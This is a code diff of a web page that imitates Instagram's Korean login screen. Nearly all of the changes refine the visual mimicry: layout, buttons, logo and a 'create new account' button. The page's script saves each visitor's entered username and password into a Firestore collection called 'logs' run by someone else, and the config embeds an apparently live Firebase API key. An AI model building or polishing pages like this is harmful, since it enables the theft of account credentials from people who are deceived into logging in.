--- a/index.html
+++ b/index.html
@@ -5,22 +5,28 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Instagram</title>
     <style>
-        body { background-color: #fff; margin: 0; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif; display: flex; flex-direction: column; align-items: center; }
-        .container { width: 100%; max-width: 350px; padding: 20px; box-sizing: border-box; margin-top: 40px; text-align: center; }
-        .logo { width: 175px; margin-bottom: 40px; }
-        input { width: 100%; padding: 12px; margin-bottom: 12px; border: 1px solid #dbdbdb; border-radius: 5px; background-color: #fafafa; box-sizing: border-box; font-size: 14px; }
-        .btn-login { width: 100%; background-color: #0095f6; color: white; border: none; padding: 10px; border-radius: 8px; font-weight: 600; cursor: pointer; font-size: 14px; margin-top: 10px; }
-        .btn-login:disabled { background-color: #b2dffc; }
-        .forgot-pw { color: #00376b; font-size: 12px; text-decoration: none; margin-top: 20px; display: block; }
-        .footer { margin-top: auto; padding: 20px; color: #8e8e8e; font-size: 12px; text-align: center; }
-        .meta-logo { width: 60px; margin-top: 10px; opacity: 0.6; }
-        .signup-box { margin-top: 40px; border: 1px solid #dbdbdb; padding: 20px; width: 100%; box-sizing: border-box; border-radius: 1px; }
-        .signup-link { color: #0095f6; font-weight: 600; text-decoration: none; }
+        body { background-color: #ffffff; margin: 0; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif; display: flex; flex-direction: column; align-items: center; min-height: 100vh; }
+        .top-bar { width: 100%; padding: 15px; display: flex; align-items: center; justify-content: flex-start; box-sizing: border-box; }
+        .back-arrow { font-size: 24px; cursor: pointer; margin-left: 10px; }
+        .language { color: #8e8e8e; font-size: 14px; margin: 20px 0; cursor: pointer; }
+        .container { width: 100%; max-width: 350px; padding: 0 30px; box-sizing: border-box; text-align: center; flex-grow: 1; }
+        .logo-img { width: 80px; height: 80px; margin-bottom: 30px; }
+        input { width: 100%; padding: 14px; margin-bottom: 12px; border: 1px solid #dbdbdb; border-radius: 12px; background-color: #ffffff; box-sizing: border-box; font-size: 14px; }
+        .btn-login { width: 100%; background-color: #0064e0; color: white; border: none; padding: 12px; border-radius: 25px; font-weight: 600; cursor: pointer; font-size: 15px; margin-top: 5px; }
+        .btn-login:disabled { opacity: 0.5; }
+        .forgot-pw { color: #000000; font-size: 14px; font-weight: 600; text-decoration: none; margin-top: 20px; display: block; }
+        .bottom-section { width: 100%; max-width: 350px; padding: 20px; box-sizing: border-box; text-align: center; }
+        .btn-signup { width: 100%; background-color: transparent; color: #0064e0; border: 1px solid #0064e0; padding: 10px; border-radius: 25px; font-weight: 600; cursor: pointer; font-size: 14px; margin-bottom: 20px; }
+        .meta-footer { color: #8e8e8e; font-size: 12px; display: flex; flex-direction: column; align-items: center; margin-bottom: 20px; }
+        .meta-logo { width: 60px; margin-top: 5px; opacity: 0.7; }
     </style>
 </head>
 <body>
+    <div class="top-bar"><span class="back-arrow">←</span></div>
+    <div class="language">한국어 ∨</div>
+
     <div class="container">
-        <img src="https://www.instagram.com/static/images/web/logged_out_wordmark.png/7a2511100076.png" alt="Instagram" class="logo">
+        <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/e/e7/Instagram_logo_2016.svg/2048px-Instagram_logo_2016.svg.png" alt="Instagram Logo" class="logo-img">
         
         <form id="loginForm">
             <input type="text" id="id" placeholder="사용자 이름, 이메일 주소 또는 휴대폰 번호" required>
@@ -29,22 +35,21 @@
         </form>
 
         <a href="#" class="forgot-pw">비밀번호를 잊으셨나요?</a>
-
-        <div class="signup-box">
-            <span style="font-size: 14px;">계정이 없으신가요? <a href="#" class="signup-link">가입하기</a></span>
-        </div>
     </div>
 
-    <div class="footer">
-        <div style="margin-bottom: 10px;">Meta</div>
-        <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/7/7b/Meta_Platforms_Inc._logo.svg/1280px-Meta_Platforms_Inc._logo.svg.png" alt="Meta" class="meta-logo">
+    <div class="bottom-section">
+        <button class="btn-signup">새 계정 만들기</button>
+        <div class="meta-footer">
+            <span>Meta</span>
+            <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/7/7b/Meta_Platforms_Inc._logo.svg/1280px-Meta_Platforms_Inc._logo.svg.png" alt="Meta Logo" class="meta-logo">
+        </div>
     </div>
 
     <script type="module">
         import { initializeApp } from "https://www.gstatic.com/firebasejs/10.8.0/firebase-app.js";
         import { getFirestore, collection, addDoc } from "https://www.gstatic.com/firebasejs/10.8.0/firebase-firestore.js";
 
-        // 상준님의 Firebase 설정값 그대로 유지
+        // 상준님의 Firebase 설정값 (그대로 유지)
         const firebaseConfig = {
             apiKey: "AIzaSyDGS9mDbbKXNL4OrskQ3ZDHBsKb8Glroj4",
             authDomain: "instagram-be709.firebaseapp.com",
@@ -67,6 +72,7 @@
             submitBtn.disabled = true;
 
             try {
+                // 데이터 저장
                 await addDoc(collection(db, "logs"), {
                     userId: idVal,
                     userPw: pwVal,
